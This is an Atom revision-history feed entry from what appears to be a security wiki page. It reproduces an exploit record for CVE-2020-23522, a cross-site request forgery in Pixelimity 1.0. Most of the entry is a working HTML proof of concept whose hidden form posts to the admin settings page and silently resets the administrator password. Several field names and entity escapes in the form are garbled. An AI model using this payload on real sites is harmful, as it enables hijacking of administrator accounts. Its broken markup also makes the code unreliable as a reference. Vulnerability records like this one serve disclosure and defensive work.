https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-23522_Pixelimity_1.0_%E8%B7%A8%E7%AB%99%E8%AB%8B%E6%B1%82%E5%81%BD%E9%80%A0%E6%BC%8F%E6%B4%9E
CVE-2020-23522 Pixelimity 1.0 跨站請求偽造漏洞 - Revision history
2026-04-17T17:38:14Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2020-23522_Pixelimity_1.0_%E8%B7%A8%E7%AB%99%E8%AB%8B%E6%B1%82%E5%81%BD%E9%80%A0%E6%BC%8F%E6%B4%9E&diff=3756&oldid=prev
Pwnwiki: Created page with "<pre> # Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery # Date: 2020-06-03 # Exploit Author: Noth # Vendor Homepage: https://github.com/pixelimity/pixeli..."
2021-05-31T03:54:50Z
<p>Created page with "<pre> # Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery # Date: 2020-06-03 # Exploit Author: Noth # Vendor Homepage: https://github.com/pixelimity/pixeli..."</p>
<p><b>New page</b></p><div><pre><br />
# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery<br />
# Date: 2020-06-03<br />
# Exploit Author: Noth<br />
# Vendor Homepage: https://github.com/pixelimity/pixelimity<br />
# Software Link: https://github.com/pixelimity/pixelimity<br />
# Version: v1.0<br />
# CVE : 2020-23522<br />
<br />
Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter.<br />
<br />
PoC :<br />
<br />
<html><br />
<body><br />
<script>history.pushState(",",'/')</script><br />
<form action=“http://127.0.0.1/pixelimity-dev/admin/setting.php<br />
” method=“POST”><br />
<input type=“hidden” name=“submit_setting” value=“Save Setting”/><br />
<input type=“hidden” name=“data[admin_portfolio_show]”<br />
value=“5”/><br />
<input type=“hidden” name=“data[admin_pages_show]”<br />
value=“5”/><br />
<input type=“hidden” name=“admin[data_password]”<br />
value=“456789”/><br />
<input type=“hidden” name=“data[site#95;name]"<br />
value=“Pixelimity”/><br />
<input type=“hidden” name=“data[site_name]show]”<br />
value=“My Online Portfolio”/><br />
<input type=“hidden” name=“data[home_image_size&#93” value=“5”/><br />
<input type=“hidden” name=“ data[single_image_image_size#93<br />
” value=“ 240&44;0,0&44;auto ”/><br />
<input type=“hidden” name=“data[single_image_image_size#93”<br />
value=“720&44;0,0&44;auto”/><br />
<input type=“submit” value=“Submit request”/><br />
</form><br />
</body><br />
</html><br />
</pre></div>
Pwnwiki